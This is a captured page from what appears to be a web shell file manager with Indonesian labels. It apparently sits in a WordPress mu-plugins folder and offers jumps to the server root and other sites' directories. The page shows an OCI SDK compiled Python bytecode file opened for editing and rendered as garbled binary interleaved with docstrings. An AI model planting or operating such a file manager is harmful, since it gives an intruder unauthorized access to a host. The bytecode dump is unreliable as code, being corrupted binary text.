📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/umvavtmy/public_html/website_b18404e2/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
integration
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/integration/models/__pycache__
💾
Free:
48.2 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: public_endpoint_details.cpython-39.opt-1.pyc
a ���fv � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�NetworkEndpointDetails� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�PublicEndpointDetailsz0 Public endpoint configuration details. c K sB ddddd�| _ dddd d�| _d | _d | _d | _d | _d| _d S )a� Initializes a new PublicEndpointDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.integration.models.PublicEndpointDetails.network_endpoint_type` attribute of this class is ``PUBLIC`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param network_endpoint_type: The value to assign to the network_endpoint_type property of this PublicEndpointDetails. Allowed values for this property are: "PUBLIC" :type network_endpoint_type: str :param allowlisted_http_ips: The value to assign to the allowlisted_http_ips property of this PublicEndpointDetails. :type allowlisted_http_ips: list[str] :param allowlisted_http_vcns: The value to assign to the allowlisted_http_vcns property of this PublicEndpointDetails. :type allowlisted_http_vcns: list[oci.integration.models.VirtualCloudNetwork] :param is_integration_vcn_allowlisted: The value to assign to the is_integration_vcn_allowlisted property of this PublicEndpointDetails. :type is_integration_vcn_allowlisted: bool �strz list[str]zlist[VirtualCloudNetwork]�bool)Znetwork_endpoint_type�allowlisted_http_ips�allowlisted_http_vcns�is_integration_vcn_allowlistedZnetworkEndpointTypeZallowlistedHttpIpsZallowlistedHttpVcnsZisIntegrationVcnAllowlistedNZPUBLIC)Z swagger_typesZ attribute_mapZ_network_endpoint_type�_allowlisted_http_ips�_allowlisted_http_vcns�_is_integration_vcn_allowlisted)�self�kwargs� r �R/usr/lib/python3.9/site-packages/oci/integration/models/public_endpoint_details.py�__init__ s ��zPublicEndpointDetails.__init__c C s | j S )a\ Gets the allowlisted_http_ips of this PublicEndpointDetails. Source IP addresses or IP address ranges ingress rules. (ex: "168.122.59.5", "10.20.30.0/26") An invalid IP or CIDR block will result in a 400 response. :return: The allowlisted_http_ips of this PublicEndpointDetails. :rtype: list[str] �r �r r r r r >